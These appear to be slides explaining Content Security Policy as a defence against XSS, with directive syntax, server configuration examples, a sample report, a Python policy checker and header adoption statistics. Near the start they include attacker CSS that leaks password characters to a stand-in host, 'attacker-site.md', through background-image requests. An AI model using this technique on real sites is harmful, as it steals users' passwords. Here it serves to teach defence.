Information security monitoring analyst:
Igor Tarpan
Armed Forces of the Republic of Moldova
Networking
Server management
Security
Starlab
Information security engineer
Endava
Information security monitoring analyst
https://good-site.md/js/main.js
https://good-site.md/css/main.css
https://cdn.good-site.md/img/img/
http://attacker-site.md/xss/malicious.js
https://cdn.cloudflare.com/cache/
Among the top 15 vulnerability types reported on HackerOne, cross-site scripting (XSS, CWE-79) continued to be the most common vulnerability across all industries, with the exception of Healthcare and Technology.
/* Attacker-controlled CSS: each attribute selector matches when the password
   field's value ends with a given character and makes the browser fetch an
   image from the attacker's host, leaking that character. A style-src that
   excludes attacker-site.md stops these requests. */
input[type="password"][value$="A"] {
background-image: url("http://attacker-site.md:80085/A");
}
input[type="password"][value$="B"] {
background-image: url("http://attacker-site.md:80085/B");
}
input[type="password"][value$="C"] {
background-image: url("http://attacker-site.md:80085/C");
}
input[type="password"][value$="D"] {
background-image: url("http://attacker-site.md:80085/D");
}
input[type="password"][value$="E"] {
background-image: url("http://attacker-site.md:80085/E");
}
input[type="password"][value$="F"] {
background-image: url("http://attacker-site.md:80085/F");
}
input[type="password"][value$="G"] {
background-image: url("http://attacker-site.md:80085/G");
}
content-encoding: gzip
content-security-policy: default-src 'self' ; img-src 'self' data: https:; script-src 'self'
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
Directive + Source type/Option ;

Directives: default-src, script-src, style-src, img-src, connect-src, font-src, object-src, media-src, frame-src, child-src, plugin-types, report-uri, ...

Source types / options: 'none', 'self', data:, domain.example.com, *.example.com, https://report.report.ui, ...
Content-Security-Policy: default-src 'none'; img-src 'self' site-bucket.s3.amazonaws.com data: ; style-src 'self' https: ; report-uri https://uri.good-site.md ;
Content-Security-Policy:default-src 'none';img-src 'self' site-bucket.s3.amazonaws.com data:;style-src 'self' https:;report-uri https://uri.good-site.md ;
Value | Example |
---|---|
* | img-src * |
'none' | style-src 'none' |
'self' | script-src 'self' |
data: | img-src 'self' data: |
domain.good-site.md | script-src domain.good-site.md |
*.good-site.md | script-src *.good-site.md |
https://domain.good-site.md | img-src https://domain.good-site.md |
https: | img-src https: |
'unsafe-inline' | script-src 'unsafe-inline' |
'unsafe-eval' | script-src 'unsafe-eval' |
'nonce-<value>' | script-src 'nonce-580085' |
'sha256-<hash>' | script-src 'sha256-qzn...ng=' |
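To show how the directive/source grammar and the source values above are applied, here is an added Python example (not the slides' code) that evaluates the response-header policy shown earlier against the URL list from the first slides; the page origin https://good-site.md and the directive/URL pairings are assumptions, and nonces, hashes, ports and paths are left out.

```python
"""Minimal CSP source-list evaluator (added example, not the slides' code): handles
'none', 'self', data:/https: scheme sources, host and *.host sources, and default-src
fallback. Nonces, hashes, ports and path matching are out of scope."""
from urllib.parse import urlsplit

def parse_policy(header):
    """'default-src 'self'; img-src data:' -> {'default-src': ["'self'"], 'img-src': ['data:']}"""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def source_allows(expr, url, page_origin):
    """Does one source expression permit a fetch of url from a document at page_origin?"""
    u, page, e = urlsplit(url), urlsplit(page_origin), expr.lower()
    if e == "'none'":
        return False
    if e == "'self'":
        return (u.scheme, u.netloc) == (page.scheme, page.netloc)
    if e.endswith(":") and "/" not in e:          # scheme-source such as https: or data:
        return u.scheme == e[:-1]
    hs = urlsplit(e if "://" in e else "//" + e)  # host-source with optional scheme
    if u.scheme not in ({hs.scheme} if hs.scheme else {page.scheme, "https"}):
        return False
    host, pat = u.hostname or "", hs.hostname or ""
    # '*.good-site.md' matches cdn.good-site.md but not good-site.md itself
    return host.endswith(pat[1:]) if pat.startswith("*.") else host == pat

def policy_allows(policy, directive, url, page_origin):
    """Fetch directives fall back to default-src; if neither is set the fetch is allowed."""
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True
    return any(source_allows(s, url, page_origin) for s in sources)

PAGE = "https://good-site.md"                      # assumed origin of the slides' site
POLICY = parse_policy("default-src 'self'; img-src 'self' data: https:; script-src 'self'")
CHECKS = [("script-src", "https://good-site.md/js/main.js"),  # URLs from the slide list
          ("style-src", "https://good-site.md/css/main.css"),
          ("img-src", "https://cdn.good-site.md/img/img/"),
          ("script-src", "http://attacker-site.md/xss/malicious.js"),
          ("script-src", "https://cdn.cloudflare.com/cache/")]

if __name__ == "__main__":
    for directive, url in CHECKS:
        verdict = "allowed" if policy_allows(POLICY, directive, url, PAGE) else "BLOCKED"
        print(f"{directive:10} {url:45} {verdict}")
```

Note that style-src is not set in that policy, so the stylesheet is judged by default-src, while the cdn.good-site.md image passes only because img-src contains the broad https: source.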
Content-Security-Policy: default-src 'none'; report-uri https://report.good-site.md/report/;
Content-Security-Policy-Report-Only: default-src 'none'; report-uri https://report.good-site.md/report/;
{
  "csp-report": {
    "document-uri": "http://example.com/signup.html",
    "referrer": "",
    "blocked-uri": "http://example.com/css/style.css",
    "violated-directive": "style-src cdn.example.com",
    "original-policy": "default-src 'none'; style-src cdn.example.com; report-uri /_/csp-reports",
    "disposition": "report"
  }
}
Nginx
add_header Content-Security-Policy "default-src 'self';";
Apache
Header set Content-Security-Policy "default-src 'self';"
HAProxy
http-response set-header Content-Security-Policy "default-src 'self' 'unsafe-inline' www.google-analytics.com"
Meta tag
<meta http-equiv="Content-Security-Policy" content="default-src https://cdn.example.net; child-src 'none'; object-src 'none'">
Header | Sites | Share |
---|---|---|
HPKP | 8136 | 0.86 % |
HSTS | 120482 | 12.75 % |
X-XSS-Protection Header | 123817 | 13.10 % |
X-Frame-Options Header | 139548 | 14.77 % |
X Permitted Cross Domain Policies Header | 16692 | 1.80 % |
Content-Security-Policy (CSP) Header | 33153 | 3.51 % |
X-Content-Type-Options Header | 150949 | 15.94 % |

Header | Sites | Share |
---|---|---|
HPKP | 1 | 0.5 % |
HSTS | 30 | 15 % |
X-XSS-Protection Header | 28 | 14 % |
X-Frame-Options Header | 36 | 18 % |
X Permitted Cross Domain Policies Header | 1 | 0.5 % |
Content-Security-Policy (CSP) Header | 3 | 1.5 % |
X-Content-Type-Options Header | 31 | 15.5 % |